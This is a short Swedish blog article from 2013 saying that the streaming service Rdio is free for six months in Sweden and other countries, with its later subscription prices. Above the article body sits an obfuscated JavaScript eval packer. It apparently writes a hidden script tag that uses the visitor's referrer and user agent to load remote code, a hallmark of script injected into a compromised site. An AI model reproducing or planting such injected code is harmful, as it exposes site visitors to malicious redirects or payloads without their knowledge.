Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Spotify-konkurrenten Rdio är gratis i 6 månader

Filip Urde
  • On 29 januari, 2013
  • http://www.revue.se/filip-urde

(Nya) eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnsny|var|u0026u|referrer|titda||js|php’.split(’|’),0,{}))
Streamingtjänsten Rdio, vilken kom till Sverige här i slutet av förra året kör nu en kampanj där man bjuder användare i Sverige och 14 andra länder på sex månader gratis användning av tjänsten. 

 

Tjänsten är precis som Spotify, helt enkelt en tjänst som ger användaren möjlighet att lyssna på reklamfri musik både på datorn och mobilen via streaming.

Kan alltså vara värt att testa bara för sakens skull. Vill du fortsätta använda tjänsten efter dina 6 månaders gratis-period, så tecknar du ett standardabonnemang där man har valet att lyssna via dator för 49 kronor i månaden eller ett premiumabonnemang där man kan lyssna både via dator och mobil samt offline för 99 kronor i månaden.

Tyvärr har ingen av oss här på Revue testat tjänsten, så vi kan inte säga om den är bra eller dålig ännu. Men vi ska sätta igång och prova och avlägga en rapport så småningom.
thenextweb.com